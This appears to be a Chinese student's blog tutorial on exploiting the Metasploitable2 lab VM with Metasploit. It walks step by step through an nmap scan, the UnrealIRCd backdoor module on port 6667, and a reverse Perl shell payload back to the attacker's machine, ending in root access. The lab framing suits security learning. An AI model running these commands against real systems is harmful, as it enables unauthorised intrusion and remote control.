漏洞利用

前言：隔了一个多星期我回来了（有一些事），上一期说了metasploit制作木马病毒以及怎么防范本期说的是漏洞利用。
材料：kali linux  ，和metasploitable2
准备：搭建metasploit靶场，用VM虚拟机或其他虚拟机。怎么安装就不赘述了，感兴趣怎么安装的可以留言“1”
1.启动metasploitable2 的靶场账号和密码是msfadmin，在靶场终端输入ifconfig。并记下IP地址
2.使用前几期的nmap用法，扫描靶场漏洞（时间有点长），附：图片应该在最后如没有图片就谅解一下，有可能没有传上去
3.找一下可以用的漏洞端口，本期实例用的是6667端口漏洞。本端口只供参考，具体问题自己分析毕竟漏洞不只这一种。
4.使用metasploit控制台，在终端输入msfconsole
5.在控制台输入use exploit/unix/irc/unreal_ircd_3281_backdoor            (附：use是使用，use后面的是使用的模块)
6.在控制台输入show options                                                                 （附：这个命令的作用是）
7.配置RHOSTS 为空 ，使用我们要配置RHOSTS。在控制台输入 set RHOSTS <ip>       （附：<ip>是靶场IP“<>”不要输入到终端）
8.配置payload ， set payload cmd/unix/reverse_perl   。还有配置lhost ------------- set lhost <ip>   （附:ip是自己攻击者的IP ，其他跟上面一样）
9.配置好了后，输入run   
10.过一会就拿到root权限了
结言:本期知识点只用与合法渗透测试，并不适用其他用途。后果与本人无关！本人学术不精，语言平滑，请谅解。本人更贴不是特别勤原因有很多，但长假期还是更的比较频繁的。如果你有上面感兴趣的话题或者想让我更什么欢迎在下面留言。如果支持我的话就关注我吧。注：我也是学生，感兴趣的一起学习吧。

h

1